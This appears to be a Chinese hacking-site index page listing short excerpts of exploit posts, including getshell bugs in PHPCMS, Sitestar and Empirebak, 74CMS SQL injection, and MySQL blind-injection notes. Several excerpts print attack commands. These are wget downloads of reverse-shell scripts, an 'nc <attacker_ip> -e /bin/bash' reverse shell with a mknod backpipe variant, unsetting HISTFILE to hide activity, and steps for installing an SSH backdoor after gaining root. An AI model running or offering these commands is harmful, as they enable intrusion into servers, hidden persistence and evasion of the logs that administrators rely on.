phpcms phpsso_auth_key泄露: WooYun: PHPCMS V9 一个为所欲为的漏洞 http://www.2cto.com/phpsso_ser...
11月21日755 views评论key
v
PHPCMS V9 一个为所欲为的漏洞
11月21日755 views评论key
v
11月21日755 views评论key
v
建站之星Sitestar前台Getshell一枚
漏洞作者: ′ 雨。 简要描述: 看sitestar 在某数字公司还是属于一般应用的, 就准备提数字了。 太坑了 然后果断拒绝提交详情。 还是提到乌云来把。 不知道sitestar...
11月21日402 views评论getshell
php
linux下反弹shell脚本 C版和Perl版 webshell反弹回命令行
在线下载 可以用 wget http://www.linux so.com/exp/shell.c wget http://www.linuxso.com/exp/shell.pl
11月21日moonsec_com1,103 views评论linux
shell
【国内数千机构邮箱的沦陷】eYou邮箱系统系列产品若干个漏洞
eYou是目前国内机构(高校、政府、企业)使用率最高的邮箱系统之一。 今发现eYou邮件系统、eYou邮件网关系统有多处严重的安全隐患,攻击者可入侵服务器和盗取任意邮箱信息。 影响...
11月21日1,378 views评论搜索
邮箱
帝国备份王(Empirebak)万能cookie及拿shell
帝国备份王(Empirebak)万能cookie及拿shell 漏洞 作者: Flow 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456...
11月21日536 views评论cookie
shell
Linux 入侵检测技巧知识
1. 登录ssh之后不记录history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/...
11月21日moonsec_com341 views评论history
xxx
74CMS Sql注入漏洞一枚2
教你ssh后门安装
首先需要root权限,取得root权限后放一个ssh后门,这样就算管理员改了root密码,你也可以通过这个sshbackdoor登入。。。 1、mv /etc/ssh/ssh_config /etc/...
11月21日moonsec_com660 views评论root
shell
C#常用字符串加密解密方法封装代码
//方法一 //须添加对System.Web的引用 //using System.Web.Security; /// <summary> /// SHA1加密字符串 /// </su...
11月21日moonsec_com308 views评论system
加密
74CMS Sql 注入漏洞一枚1
漏洞 作者: ′ 雨。 在user/user_pms.php中 elseif($act=="add_save") { $setsqlarr['msgtype']=2; $setsq...
11月21日342 views评论session
user
mysql搜索型注入盲注语句备份
先来说一点基础的东西。 php中和mysql 的一点基本的知识。大鸟飞过了 left() 从左向右截取 length()函数是计算括号中数据的长度,回显为纯数字,可以用大于小于和等...
11月21日moonsec_com393 views评论mysql
字符
linux下反弹Shell的五种方法
1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p;...
11月21日moonsec_com477 views评论bin
ip
65